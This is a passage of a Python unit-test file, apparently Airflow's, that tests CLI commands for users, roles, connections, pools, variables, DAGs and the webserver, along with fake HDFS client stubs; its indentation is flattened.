self.app.config['TESTING'] = True
self.parser = cli.CLIFactory.get_parser()
self.dagbag = DagBag(dag_folder=DEV_NULL, include_examples=True)
settings.configure_orm()
self.session = Session
def tearDown(self):
self._cleanup(session=self.session)
for email in [self.TEST_USER1_EMAIL, self.TEST_USER2_EMAIL]:
test_user = self.appbuilder.sm.find_user(email=email)
if test_user:
self.appbuilder.sm.del_register_user(test_user)
for role_name in ['FakeTeamA', 'FakeTeamB']:
if self.appbuilder.sm.find_role(role_name):
self.appbuilder.sm.delete_role(role_name)
super().tearDown()
@staticmethod
def _cleanup(session=None):
if session is None:
session = Session()
session.query(Pool).delete()
session.query(Variable).delete()
session.commit()
session.close()
def test_cli_list_dags(self):
args = self.parser.parse_args(['dags', 'list', '--report'])
cli.list_dags(args)
def test_cli_list_dag_runs(self):
cli.trigger_dag(self.parser.parse_args([
'dags', 'trigger', 'example_bash_operator', ]))
args = self.parser.parse_args(['dags', 'list_runs',
'example_bash_operator',
'--no_backfill'])
cli.list_dag_runs(args)
def test_cli_create_user_random_password(self):
args = self.parser.parse_args([
'users', 'create', '--username', 'test1', '--lastname', 'doe',
'--firstname', 'jon',
'--email', 'jdoe@foo.com', '--role', 'Viewer', '--use_random_password'
])
cli.users_create(args)
def test_cli_create_user_supplied_password(self):
args = self.parser.parse_args([
'users', 'create', '--username', 'test2', '--lastname', 'doe',
'--firstname', 'jon',
'--email', 'jdoe@apache.org', '--role', 'Viewer', '--password', 'test'
])
cli.users_create(args)
def test_cli_delete_user(self):
args = self.parser.parse_args([
'users', 'create', '--username', 'test3', '--lastname', 'doe',
'--firstname', 'jon',
'--email', 'jdoe@example.com', '--role', 'Viewer', '--use_random_password'
])
cli.users_create(args)
args = self.parser.parse_args([
'users', 'delete', '--username', 'test3',
])
cli.users_delete(args)
def test_cli_list_users(self):
for i in range(0, 3):
args = self.parser.parse_args([
'users', 'create', '--username', 'user{}'.format(i), '--lastname',
'doe', '--firstname', 'jon',
'--email', 'jdoe+{}@gmail.com'.format(i), '--role', 'Viewer',
'--use_random_password'
])
cli.users_create(args)
with mock.patch('sys.stdout', new_callable=io.StringIO) as mock_stdout:
cli.users_list(self.parser.parse_args(['users', 'list']))
stdout = mock_stdout.getvalue()
for i in range(0, 3):
self.assertIn('user{}'.format(i), stdout)
def test_cli_import_users(self):
def assertUserInRoles(email, roles):
for role in roles:
self.assertTrue(self._does_user_belong_to_role(email, role))
def assertUserNotInRoles(email, roles):
for role in roles:
self.assertFalse(self._does_user_belong_to_role(email, role))
assertUserNotInRoles(self.TEST_USER1_EMAIL, ['Admin', 'Op'])
assertUserNotInRoles(self.TEST_USER2_EMAIL, ['Public'])
users = [
{
"username": "imported_user1", "lastname": "doe1",
"firstname": "jon", "email": self.TEST_USER1_EMAIL,
"roles": ["Admin", "Op"]
},
{
"username": "imported_user2", "lastname": "doe2",
"firstname": "jon", "email": self.TEST_USER2_EMAIL,
"roles": ["Public"]
}
]
self._import_users_from_file(users)
assertUserInRoles(self.TEST_USER1_EMAIL, ['Admin', 'Op'])
assertUserInRoles(self.TEST_USER2_EMAIL, ['Public'])
users = [
{
"username": "imported_user1", "lastname": "doe1",
"firstname": "jon", "email": self.TEST_USER1_EMAIL,
"roles": ["Public"]
},
{
"username": "imported_user2", "lastname": "doe2",
"firstname": "jon", "email": self.TEST_USER2_EMAIL,
"roles": ["Admin"]
}
]
self._import_users_from_file(users)
assertUserNotInRoles(self.TEST_USER1_EMAIL, ['Admin', 'Op'])
assertUserInRoles(self.TEST_USER1_EMAIL, ['Public'])
assertUserNotInRoles(self.TEST_USER2_EMAIL, ['Public'])
assertUserInRoles(self.TEST_USER2_EMAIL, ['Admin'])
def test_cli_export_users(self):
user1 = {"username": "imported_user1", "lastname": "doe1",
"firstname": "jon", "email": self.TEST_USER1_EMAIL,
"roles": ["Public"]}
user2 = {"username": "imported_user2", "lastname": "doe2",
"firstname": "jon", "email": self.TEST_USER2_EMAIL,
"roles": ["Admin"]}
self._import_users_from_file([user1, user2])
users_filename = self._export_users_to_file()
with open(users_filename, mode='r') as file:
retrieved_users = json.loads(file.read())
os.remove(users_filename)
# ensure that an export can be imported
self._import_users_from_file(retrieved_users)
def find_by_username(username):
matches = [u for u in retrieved_users
if u['username'] == username]
if not matches:
self.fail("Couldn't find user with username {}".format(username))
else:
matches[0].pop('id')  # this key is not required for import
return matches[0]
self.assertEqual(find_by_username('imported_user1'), user1)
self.assertEqual(find_by_username('imported_user2'), user2)
def _import_users_from_file(self, user_list):
json_file_content = json.dumps(user_list)
f = NamedTemporaryFile(delete=False)
try:
f.write(json_file_content.encode())
f.flush()
args = self.parser.parse_args([
'users', 'import', f.name
])
cli.users_import(args)
finally:
os.remove(f.name)
def _export_users_to_file(self):
f = NamedTemporaryFile(delete=False)
args = self.parser.parse_args([
'users', 'export', f.name
])
cli.users_export(args)
return f.name
def _does_user_belong_to_role(self, email, rolename):
user = self.appbuilder.sm.find_user(email=email)
role = self.appbuilder.sm.find_role(rolename)
if user and role:
return role in user.roles
return False
def test_cli_add_user_role(self):
args = self.parser.parse_args([
'users', 'create', '--username', 'test4', '--lastname', 'doe',
'--firstname', 'jon',
'--email', self.TEST_USER1_EMAIL, '--role', 'Viewer', '--use_random_password'
])
cli.users_create(args)
self.assertFalse(
self._does_user_belong_to_role(email=self.TEST_USER1_EMAIL,
rolename='Op'),
"User should not yet be a member of role 'Op'"
)
args = self.parser.parse_args([
'users', 'add_role', '--username', 'test4', '--role', 'Op'
])
cli.users_manage_role(args, remove=False)
self.assertTrue(
self._does_user_belong_to_role(email=self.TEST_USER1_EMAIL,
rolename='Op'),
"User should have been added to role 'Op'"
)
def test_cli_remove_user_role(self):
args = self.parser.parse_args([
'users', 'create', '--username', 'test4', '--lastname', 'doe',
'--firstname', 'jon',
'--email', self.TEST_USER1_EMAIL, '--role', 'Viewer', '--use_random_password'
])
cli.users_create(args)
self.assertTrue(
self._does_user_belong_to_role(email=self.TEST_USER1_EMAIL,
rolename='Viewer'),
"User should have been created with role 'Viewer'"
)
args = self.parser.parse_args([
'users', 'remove_role', '--username', 'test4', '--role', 'Viewer'
])
cli.users_manage_role(args, remove=True)
self.assertFalse(
self._does_user_belong_to_role(email=self.TEST_USER1_EMAIL,
rolename='Viewer'),
"User should have been removed from role 'Viewer'"
)
@mock.patch("airflow.bin.cli.DagBag")
def test_cli_sync_perm(self, dagbag_mock):
self.expect_dagbag_contains([
DAG('has_access_control',
access_control={
'Public': {'can_dag_read'}
}),
DAG('no_access_control')
], dagbag_mock)
self.appbuilder.sm = mock.Mock()
args = self.parser.parse_args([
'sync_perm'
])
cli.sync_perm(args)
assert self.appbuilder.sm.sync_roles.call_count == 1
self.assertEqual(2,
len(self.appbuilder.sm.sync_perm_for_dag.mock_calls))
self.appbuilder.sm.sync_perm_for_dag.assert_any_call(
'has_access_control',
{'Public': {'can_dag_read'}}
)
self.appbuilder.sm.sync_perm_for_dag.assert_any_call(
'no_access_control',
None,
)
def expect_dagbag_contains(self, dags, dagbag_mock):
dagbag = mock.Mock()
dagbag.dags = {dag.dag_id: dag for dag in dags}
dagbag_mock.return_value = dagbag
def test_cli_create_roles(self):
self.assertIsNone(self.appbuilder.sm.find_role('FakeTeamA'))
self.assertIsNone(self.appbuilder.sm.find_role('FakeTeamB'))
args = self.parser.parse_args([
'roles', 'create', 'FakeTeamA', 'FakeTeamB'
])
cli.roles_create(args)
self.assertIsNotNone(self.appbuilder.sm.find_role('FakeTeamA'))
self.assertIsNotNone(self.appbuilder.sm.find_role('FakeTeamB'))
def test_cli_create_roles_is_reentrant(self):
self.assertIsNone(self.appbuilder.sm.find_role('FakeTeamA'))
self.assertIsNone(self.appbuilder.sm.find_role('FakeTeamB'))
args = self.parser.parse_args([
'roles', 'create', 'FakeTeamA', 'FakeTeamB'
])
cli.roles_create(args)
self.assertIsNotNone(self.appbuilder.sm.find_role('FakeTeamA'))
self.assertIsNotNone(self.appbuilder.sm.find_role('FakeTeamB'))
def test_cli_list_roles(self):
self.appbuilder.sm.add_role('FakeTeamA')
self.appbuilder.sm.add_role('FakeTeamB')
with mock.patch('sys.stdout', new_callable=io.StringIO) as mock_stdout:
cli.roles_list(self.parser.parse_args(['roles', 'list']))
stdout = mock_stdout.getvalue()
self.assertIn('FakeTeamA', stdout)
self.assertIn('FakeTeamB', stdout)
def test_cli_list_tasks(self):
for dag_id in self.dagbag.dags.keys():
args = self.parser.parse_args(['tasks', 'list', dag_id])
cli.list_tasks(args)
args = self.parser.parse_args([
'tasks', 'list', 'example_bash_operator', '--tree'])
cli.list_tasks(args)
def test_cli_list_jobs(self):
args = self.parser.parse_args(['dags', 'list_jobs'])
cli.list_jobs(args)
def test_cli_list_jobs_with_args(self):
args = self.parser.parse_args(['dags', 'list_jobs', '--dag_id',
'example_bash_operator',
'--state', 'success',
'--limit', '100'])
cli.list_jobs(args)
@mock.patch("airflow.bin.cli.db.initdb")
def test_cli_initdb(self, initdb_mock):
cli.initdb(self.parser.parse_args(['db', 'init']))
initdb_mock.assert_called_once_with()
@mock.patch("airflow.bin.cli.db.resetdb")
def test_cli_resetdb(self, resetdb_mock):
cli.resetdb(self.parser.parse_args(['db', 'reset', '--yes']))
resetdb_mock.assert_called_once_with()
def test_cli_connections_list(self):
with mock.patch('sys.stdout', new_callable=io.StringIO) as mock_stdout:
cli.connections_list(self.parser.parse_args(['connections', 'list']))
stdout = mock_stdout.getvalue()
conns = [[x.strip("'") for x in re.findall(r"'\w+'", line)[:2]]
for ii, line in enumerate(stdout.split('\n'))
if ii % 2 == 1]
conns = [conn for conn in conns if len(conn) > 0]
# Assert that some of the connections are present in the output as
# expected:
self.assertIn(['aws_default', 'aws'], conns)
self.assertIn(['hive_cli_default', 'hive_cli'], conns)
self.assertIn(['emr_default', 'emr'], conns)
self.assertIn(['mssql_default', 'mssql'], conns)
self.assertIn(['mysql_default', 'mysql'], conns)
self.assertIn(['postgres_default', 'postgres'], conns)
self.assertIn(['wasb_default', 'wasb'], conns)
self.assertIn(['segment_default', 'segment'], conns)
def test_cli_connections_list_redirect(self):
cmd = ['airflow', 'connections', 'list']
with tempfile.TemporaryFile() as fp:
p = subprocess.Popen(cmd, stdout=fp)
p.wait()
self.assertEqual(0, p.returncode)
def test_cli_connections_add_delete(self):
# Add connections:
uri = 'postgresql://airflow:airflow@host:5432/airflow'
with mock.patch('sys.stdout', new_callable=io.StringIO) as mock_stdout:
cli.connections_add(self.parser.parse_args(
['connections', 'add', 'new1',
'--conn_uri=%s' % uri]))
cli.connections_add(self.parser.parse_args(
['connections', 'add', 'new2',
'--conn_uri=%s' % uri]))
cli.connections_add(self.parser.parse_args(
['connections', 'add', 'new3',
'--conn_uri=%s' % uri, '--conn_extra', "{'extra': 'yes'}"]))
cli.connections_add(self.parser.parse_args(
['connections', 'add', 'new4',
'--conn_uri=%s' % uri, '--conn_extra', "{'extra': 'yes'}"]))
cli.connections_add(self.parser.parse_args(
['connections', 'add', 'new5',
'--conn_type=hive_metastore', '--conn_login=airflow',
'--conn_password=airflow', '--conn_host=host',
'--conn_port=9083', '--conn_schema=airflow']))
cli.connections_add(self.parser.parse_args(
['connections', 'add', 'new6',
'--conn_uri', "", '--conn_type=google_cloud_platform', '--conn_extra', "{'extra': 'yes'}"]))
stdout = mock_stdout.getvalue()
# Check addition stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tSuccessfully added `conn_id`=new1 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new2 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new3 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new4 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new5 : " +
"hive_metastore://airflow:airflow@host:9083/airflow"),
("\tSuccessfully added `conn_id`=new6 : " +
"google_cloud_platform://:@:")
])
# Attempt to add duplicate
with mock.patch('sys.stdout', new_callable=io.StringIO) as mock_stdout:
cli.connections_add(self.parser.parse_args(
['connections', 'add', 'new1',
'--conn_uri=%s' % uri]))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tA connection with `conn_id`=new1 already exists",
])
# Attempt to add without providing conn_uri
with self.assertRaises(SystemExit) as exc:
cli.connections_add(self.parser.parse_args(
['connections', 'add', 'new']))
self.assertEqual(
exc.exception.code,
"The following args are required to add a connection: ['conn_uri or conn_type']"
)
# Prepare to verify the connections that were just added
session = settings.Session()
extra = {'new1': None,
'new2': None,
'new3': "{'extra': 'yes'}",
'new4': "{'extra': 'yes'}"}
# Verify the added connections
for index in range(1, 6):
conn_id = 'new%s' % index
result = (session
.query(Connection)
.filter(Connection.conn_id == conn_id)
.first())
result = (result.conn_id, result.conn_type, result.host,
result.port, result.get_extra())
if conn_id in ['new1', 'new2', 'new3', 'new4']:
self.assertEqual(result, (conn_id, 'postgres', 'host', 5432,
extra[conn_id]))
elif conn_id == 'new5':
self.assertEqual(result, (conn_id, 'hive_metastore', 'host',
9083, None))
elif conn_id == 'new6':
self.assertEqual(result, (conn_id, 'google_cloud_platform',
None, None, "{'extra': 'yes'}"))
# Delete connections
with mock.patch('sys.stdout', new_callable=io.StringIO) as mock_stdout:
cli.connections_delete(self.parser.parse_args(
['connections', 'delete', 'new1']))
cli.connections_delete(self.parser.parse_args(
['connections', 'delete', 'new2']))
cli.connections_delete(self.parser.parse_args(
['connections', 'delete', 'new3']))
cli.connections_delete(self.parser.parse_args(
['connections', 'delete', 'new4']))
cli.connections_delete(self.parser.parse_args(
['connections', 'delete', 'new5']))
cli.connections_delete(self.parser.parse_args(
['connections', 'delete', 'new6']))
stdout = mock_stdout.getvalue()
# Check deletion stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tSuccessfully deleted `conn_id`=new1",
"\tSuccessfully deleted `conn_id`=new2",
"\tSuccessfully deleted `conn_id`=new3",
"\tSuccessfully deleted `conn_id`=new4",
"\tSuccessfully deleted `conn_id`=new5",
"\tSuccessfully deleted `conn_id`=new6"
])
# Check deletions
for index in range(1, 7):
conn_id = 'new%s' % index
result = (session.query(Connection)
.filter(Connection.conn_id == conn_id)
.first())
self.assertTrue(result is None)
# Attempt to delete a non-existing connection
with mock.patch('sys.stdout', new_callable=io.StringIO) as mock_stdout:
cli.connections_delete(self.parser.parse_args(
['connections', 'delete', 'fake']))
stdout = mock_stdout.getvalue()
# Check deletion attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tDid not find a connection with `conn_id`=fake",
])
session.close()
def test_cli_test(self):
cli.test(self.parser.parse_args([
'tasks', 'test', 'example_bash_operator', 'runme_0',
DEFAULT_DATE.isoformat()]))
cli.test(self.parser.parse_args([
'tasks', 'test', 'example_bash_operator', 'runme_0', '--dry_run',
DEFAULT_DATE.isoformat()]))
def test_cli_test_with_params(self):
cli.test(self.parser.parse_args([
'tasks', 'test', 'example_passing_params_via_test_command', 'run_this',
'-tp', '{"foo":"bar"}', DEFAULT_DATE.isoformat()]))
cli.test(self.parser.parse_args([
'tasks', 'test', 'example_passing_params_via_test_command', 'also_run_this',
'-tp', '{"foo":"bar"}', DEFAULT_DATE.isoformat()]))
def test_cli_run(self):
cli.run(self.parser.parse_args([
'tasks', 'run', 'example_bash_operator', 'runme_0', '-l',
DEFAULT_DATE.isoformat()]))
def test_task_state(self):
cli.task_state(self.parser.parse_args([
'tasks', 'state', 'example_bash_operator', 'runme_0',
DEFAULT_DATE.isoformat()]))
def test_dag_state(self):
self.assertEqual(None, cli.dag_state(self.parser.parse_args([
'dags', 'state', 'example_bash_operator', DEFAULT_DATE.isoformat()])))
def test_pause(self):
args = self.parser.parse_args([
'dags', 'pause', 'example_bash_operator'])
cli.pause(args)
self.assertIn(self.dagbag.dags['example_bash_operator'].is_paused, [True, 1])
args = self.parser.parse_args([
'dags', 'unpause', 'example_bash_operator'])
cli.unpause(args)
self.assertIn(self.dagbag.dags['example_bash_operator'].is_paused, [False, 0])
def test_subdag_clear(self):
args = self.parser.parse_args([
'tasks', 'clear', 'example_subdag_operator', '--yes'])
cli.clear(args)
args = self.parser.parse_args([
'tasks', 'clear', 'example_subdag_operator', '--yes', '--exclude_subdags'])
cli.clear(args)
def test_parentdag_downstream_clear(self):
args = self.parser.parse_args([
'tasks', 'clear', 'example_subdag_operator.section-1', '--yes'])
cli.clear(args)
args = self.parser.parse_args([
'tasks', 'clear', 'example_subdag_operator.section-1', '--yes',
'--exclude_parentdag'])
cli.clear(args)
def test_get_dags(self):
dags = cli.get_dags(self.parser.parse_args(['tasks', 'clear', 'example_subdag_operator',
'--yes']))
self.assertEqual(len(dags), 1)
dags = cli.get_dags(self.parser.parse_args(['tasks', 'clear', 'subdag', '-dx', '--yes']))
self.assertGreater(len(dags), 1)
with self.assertRaises(AirflowException):
cli.get_dags(self.parser.parse_args(['tasks', 'clear', 'foobar', '-dx', '--yes']))
def test_process_subdir_path_with_placeholder(self):
self.assertEqual(os.path.join(settings.DAGS_FOLDER, 'abc'), cli.process_subdir('DAGS_FOLDER/abc'))
def test_trigger_dag(self):
cli.trigger_dag(self.parser.parse_args([
'dags', 'trigger', 'example_bash_operator',
'-c', '{"foo": "bar"}']))
self.assertRaises(
ValueError,
cli.trigger_dag,
self.parser.parse_args([
'dags', 'trigger', 'example_bash_operator',
'--run_id', 'trigger_dag_xxx',
'-c', 'NOT JSON'])
)
def test_delete_dag(self):
DM = DagModel
key = "my_dag_id"
session = settings.Session()
session.add(DM(dag_id=key))
session.commit()
cli.delete_dag(self.parser.parse_args([
'dags', 'delete', key, '--yes']))
self.assertEqual(session.query(DM).filter_by(dag_id=key).count(), 0)
self.assertRaises(
AirflowException,
cli.delete_dag,
self.parser.parse_args([
'dags', 'delete',
'does_not_exist_dag',
'--yes'])
)
def test_delete_dag_existing_file(self):
# Test to check that the DAG should be deleted even if
# the file containing it is not deleted
DM = DagModel
key = "my_dag_id"
session = settings.Session()
with tempfile.NamedTemporaryFile() as f:
session.add(DM(dag_id=key, fileloc=f.name))
session.commit()
cli.delete_dag(self.parser.parse_args([
'dags', 'delete', key, '--yes']))
self.assertEqual(session.query(DM).filter_by(dag_id=key).count(), 0)
def test_pool_create(self):
cli.pool_set(self.parser.parse_args(['pools', 'set', 'foo', '1', 'test']))
self.assertEqual(self.session.query(Pool).count(), 1)
def test_pool_get(self):
cli.pool_set(self.parser.parse_args(['pools', 'set', 'foo', '1', 'test']))
try:
cli.pool_get(self.parser.parse_args(['pools', 'get', 'foo']))
except Exception as e:
self.fail("The 'pools get foo' command raised unexpectedly: %s" % e)
def test_pool_delete(self):
cli.pool_set(self.parser.parse_args(['pools', 'set', 'foo', '1', 'test']))
cli.pool_delete(self.parser.parse_args(['pools', 'delete', 'foo']))
self.assertEqual(self.session.query(Pool).count(), 0)
def test_pool_import_export(self):
# Create two pools first
pool_config_input = {
"foo": {
"description": "foo_test",
"slots": 1
},
"baz": {
"description": "baz_test",
"slots": 2
}
}
with open('pools_import.json', mode='w') as file:
json.dump(pool_config_input, file)
# Import json
try:
cli.pool_import(self.parser.parse_args(['pools', 'import', 'pools_import.json']))
except Exception as e:
self.fail("The 'pools import pools_import.json' command failed: %s" % e)
# Export json
try:
cli.pool_export(self.parser.parse_args(['pools', 'export', 'pools_export.json']))
except Exception as e:
self.fail("The 'pools export pools_export.json' command failed: %s" % e)
with open('pools_export.json', mode='r') as file:
pool_config_output = json.load(file)
self.assertEqual(
pool_config_input,
pool_config_output,
"Input and output pool files are not the same")
os.remove('pools_import.json')
os.remove('pools_export.json')
def test_variables(self):
# Checks if all subcommands are properly received
cli.variables_set(self.parser.parse_args([
'variables', 'set', 'foo', '{"foo":"bar"}']))
cli.variables_get(self.parser.parse_args([
'variables', 'get', 'foo']))
cli.variables_get(self.parser.parse_args([
'variables', 'get', 'baz', '-d', 'bar']))
cli.variables_list(self.parser.parse_args([
'variables', 'list']))
cli.variables_delete(self.parser.parse_args([
'variables', 'delete', 'bar']))
cli.variables_import(self.parser.parse_args([
'variables', 'import', DEV_NULL]))
cli.variables_export(self.parser.parse_args([
'variables', 'export', DEV_NULL]))
cli.variables_set(self.parser.parse_args([
'variables', 'set', 'bar', 'original']))
# First export
cli.variables_export(self.parser.parse_args([
'variables', 'export', 'variables1.json']))
first_exp = open('variables1.json', 'r')
cli.variables_set(self.parser.parse_args([
'variables', 'set', 'bar', 'updated']))
cli.variables_set(self.parser.parse_args([
'variables', 'set', 'foo', '{"foo":"oops"}']))
cli.variables_delete(self.parser.parse_args([
'variables', 'delete', 'foo']))
# First import
cli.variables_import(self.parser.parse_args([
'variables', 'import', 'variables1.json']))
self.assertEqual('original', Variable.get('bar'))
self.assertEqual('{\n "foo": "bar"\n}', Variable.get('foo'))
# Second export
cli.variables_export(self.parser.parse_args([
'variables', 'export', 'variables2.json']))
second_exp = open('variables2.json', 'r')
self.assertEqual(first_exp.read(), second_exp.read())
second_exp.close()
first_exp.close()
# Second import
cli.variables_import(self.parser.parse_args([
'variables', 'import', 'variables2.json']))
self.assertEqual('original', Variable.get('bar'))
self.assertEqual('{\n "foo": "bar"\n}', Variable.get('foo'))
# Set a dict
cli.variables_set(self.parser.parse_args([
'variables', 'set', 'dict', '{"foo": "oops"}']))
# Set a list
cli.variables_set(self.parser.parse_args([
'variables', 'set', 'list', '["oops"]']))
# Set str
cli.variables_set(self.parser.parse_args([
'variables', 'set', 'str', 'hello string']))
# Set int
cli.variables_set(self.parser.parse_args([
'variables', 'set', 'int', '42']))
# Set float
cli.variables_set(self.parser.parse_args([
'variables', 'set', 'float', '42.0']))
# Set true
cli.variables_set(self.parser.parse_args([
'variables', 'set', 'true', 'true']))
# Set false
cli.variables_set(self.parser.parse_args([
'variables', 'set', 'false', 'false']))
# Set none
cli.variables_set(self.parser.parse_args([
'variables', 'set', 'null', 'null']))
# Export and then import
cli.variables_export(self.parser.parse_args([
'variables', 'export', 'variables3.json']))
cli.variables_import(self.parser.parse_args([
'variables', 'import', 'variables3.json']))
# Assert value
self.assertEqual({'foo': 'oops'}, models.Variable.get('dict', deserialize_json=True))
self.assertEqual(['oops'], models.Variable.get('list', deserialize_json=True))
self.assertEqual('hello string', models.Variable.get('str')) # cannot json.loads(str)
self.assertEqual(42, models.Variable.get('int', deserialize_json=True))
self.assertEqual(42.0, models.Variable.get('float', deserialize_json=True))
self.assertEqual(True, models.Variable.get('true', deserialize_json=True))
self.assertEqual(False, models.Variable.get('false', deserialize_json=True))
self.assertEqual(None, models.Variable.get('null', deserialize_json=True))
os.remove('variables1.json')
os.remove('variables2.json')
os.remove('variables3.json')
def _wait_pidfile(self, pidfile):
while True:
try:
with open(pidfile) as file:
return int(file.read())
except Exception:
sleep(1)
def test_cli_webserver_foreground(self):
# Confirm that webserver hasn't been launched.
# pgrep returns exit status 1 if no process matched.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Run webserver in foreground and terminate it.
p = subprocess.Popen(["airflow", "webserver"])
p.terminate()
p.wait()
# Assert that no process remains.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
@unittest.skipIf("TRAVIS" in os.environ and bool(os.environ["TRAVIS"]),
"Skipping test due to lack of required file permission")
def test_cli_webserver_foreground_with_pid(self):
# Run webserver in foreground with --pid option
pidfile = tempfile.mkstemp()[1]
p = subprocess.Popen(["airflow", "webserver", "--pid", pidfile])
# Check the file specified by --pid option exists
self._wait_pidfile(pidfile)
# Terminate webserver
p.terminate()
p.wait()
@unittest.skipIf("TRAVIS" in os.environ and bool(os.environ["TRAVIS"]),
"Skipping test due to lack of required file permission")
def test_cli_webserver_background(self):
import psutil
# Confirm that webserver hasn't been launched.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Run webserver in background.
subprocess.Popen(["airflow", "webserver", "-D"])
pidfile = cli.setup_locations("webserver")[0]
self._wait_pidfile(pidfile)
# Assert that gunicorn and its monitor are launched.
self.assertEqual(0, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(0, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Terminate monitor process.
pidfile = cli.setup_locations("webserver-monitor")[0]
pid = self._wait_pidfile(pidfile)
p = psutil.Process(pid)
p.terminate()
p.wait()
# Assert that no process remains.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Patch for causing webserver timeout
@mock.patch("airflow.bin.cli.get_num_workers_running", return_value=0)
def test_cli_webserver_shutdown_when_gunicorn_master_is_killed(self, _):
# Shorten timeout so that this test doesn't take too long time
args = self.parser.parse_args(['webserver'])
with conf_vars({('webserver', 'web_server_master_timeout'): '10'}):
with self.assertRaises(SystemExit) as e:
cli.webserver(args)
self.assertEqual(e.exception.code, 1)
class FakeWebHDFSHook:
def __init__(self, conn_id):
self.conn_id = conn_id
def get_conn(self):
return self.conn_id
def check_for_path(self, hdfs_path):
return hdfs_path
class FakeSnakeBiteClientException(Exception):
pass
class FakeSnakeBiteClient:
def __init__(self):
self.started = True
def ls(self, path, include_toplevel=False):
"""
        The fake snakebite client.
        :param path: a list of paths to query
        :param include_toplevel: whether to include the top-level directory info
        :return: a list of path entries matching the query
"""
if path[0] == '/datadirectory/empty_directory' and not include_toplevel:
return []
elif path[0] == '/datadirectory/datafile':
return [{
'group': 'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': 'hdfs',
'path': '/datadirectory/datafile'
}]
elif path[0] == '/datadirectory/empty_directory' and include_toplevel:
return [{
'group': 'supergroup',
'permission': 493,
'file_type': 'd',
'access_time': 0,
'block_replication': 0,
'modification_time': 1481132141540,
'length': 0,
'blocksize': 0,
'owner': 'hdfs',
'path': '/datadirectory/empty_directory'
}]
elif path[0] == '/datadirectory/not_empty_directory' and include_toplevel:
return [{
'group': 'supergroup',
'permission': 493,
'file_type': 'd',
'access_time': 0,
'block_replication': 0,
'modification_time': 1481132141540,
'length': 0,
'blocksize': 0,
'owner': 'hdfs',
'path': '/datadirectory/empty_directory'
}, {
'group': 'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': 'hdfs',
'path': '/datadirectory/not_empty_directory/test_file'
}]
elif path[0] == '/datadirectory/not_empty_directory':
return [{
'group': 'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': 'hdfs',
'path': '/datadirectory/not_empty_directory/test_file'
}]
elif path[0] == '/datadirectory/not_existing_file_or_directory':
raise FakeSnakeBiteClientException
elif path[0] == '/datadirectory/regex_dir':
return [{
'group': 'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862, 'length': 12582912,
'blocksize': 134217728,
'owner': 'hdfs',
'path': '/datadirectory/regex_dir/test1file'
}, {
'group': 'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': 'hdfs',
'path': '/datadirectory/regex_dir/test2file'
}, {
'group': 'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': 'hdfs',
'path': '/datadirectory/regex_dir/test3file'
}, {
'group': 'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': 'hdfs',
'path': '/datadirectory/regex_dir/copying_file_1.txt._COPYING_'
}, {
'group': 'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': 'hdfs',
'path': '/datadirectory/regex_dir/copying_file_3.txt.sftp'
}]
else:
raise FakeSnakeBiteClientException
class FakeHDFSHook:
def __init__(self, conn_id=None):
self.conn_id = conn_id
def get_conn(self):
client = FakeSnakeBiteClient()
return client
class TestConnection(unittest.TestCase):
def setUp(self):
utils.db.initdb()
os.environ['AIRFLOW_CONN_TEST_URI'] = (
'postgres://username:password@ec2.compute.com:5432/the_database')
os.environ['AIRFLOW_CONN_TEST_URI_NO_CREDS'] = (
'postgres://ec2.compute.com/the_database')
def tearDown(self):
env_vars = ['AIRFLOW_CONN_TEST_URI', 'AIRFLOW_CONN_AIRFLOW_DB']
for ev in env_vars:
if ev in os.environ:
del os.environ[ev]
def test_using_env_var(self):
c = SqliteHook.get_connection(conn_id='test_uri')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertEqual('username', c.login)
self.assertEqual('password', c.password)
self.assertEqual(5432, c.port)
def test_using_unix_socket_env_var(self):
c = SqliteHook.get_connection(conn_id='test_uri_no_creds')
self.assertEqual('ec2.compute.com', c.host)
